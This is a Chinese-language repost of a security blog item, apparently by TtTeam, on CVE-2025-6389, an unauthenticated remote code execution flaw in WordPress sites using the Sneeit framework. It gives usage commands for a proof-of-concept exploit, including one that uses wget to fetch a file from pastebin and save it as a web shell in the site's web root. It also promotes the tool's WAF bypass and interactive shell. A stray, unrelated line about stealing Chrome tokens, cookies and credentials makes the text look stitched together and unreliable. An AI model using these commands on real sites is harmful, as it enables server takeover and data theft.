文章总结: CVE-2025-6389是影响使用Sneeit框架WordPress网站的严重远程代码执行漏洞。攻击者无需登录即可完全接管服务器,上传WebShell或修改文件。该漏洞已在野外被积极利用,且提供的POC工具能绕过多数WAF并在8.3及以下版本获取交互式Shell,建议立即排查修复。 综合评分: 88 文章分类: 漏洞分析,漏洞POC,漏洞预警,WEB安全
CVE-2025-6389 — WordPress 严重零日漏洞(远程代码执行)
TtTeam
2026年1月7日 16:52 海南
从现代 Chrome 版本中提取数据,包括刷新令牌、Cookie、已保存的凭据、自动填充数据、浏览历史记录和书签。
🔓无需登录
💥服务器可能被完全接管
📤 攻击者可以上传 shell、添加管理员用户或修改主题/插件文件
🧬 已在野外被积极开发利用
🎯 影响任何使用 Sneeit 框架或与其捆绑的主题(例如FlatNews)的 WordPress 网站
# Install dependenciespip3 install requests colorama
# Check vulnerability + get interactive shellpython3 CVE-2025-6389.py https://target.com
# Execute a single command onlypython3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"
概念验证的特点
- 在 8.3 及以下版本上100%有效
- 无需 cookie、nonce 或特殊标头
- 绕过大多数基本WAF(有效载荷通过普通POST发送)
- 完整的交互式外壳
- 即使输出被抑制,也能检测到漏洞
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:TtTeam 《CVE-2025-6389 — WordPress 严重零日漏洞(远程代码执行)》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论